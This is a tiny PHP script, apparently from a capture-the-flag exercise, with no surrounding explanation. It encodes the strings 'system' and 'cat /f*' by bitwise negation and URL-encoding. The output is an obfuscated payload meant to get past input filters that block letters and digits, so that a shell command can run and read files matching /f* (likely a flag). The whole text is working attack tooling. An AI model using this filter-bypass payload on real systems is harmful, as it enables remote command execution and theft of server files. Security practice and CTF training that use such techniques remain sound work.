编辑代码

<?php

$a="system";
$a=urlencode(~$a);  //  ~ 取反写法
$b="cat /f*";
$b=urlencode(~$b);
echo $a."\n".$b;

?>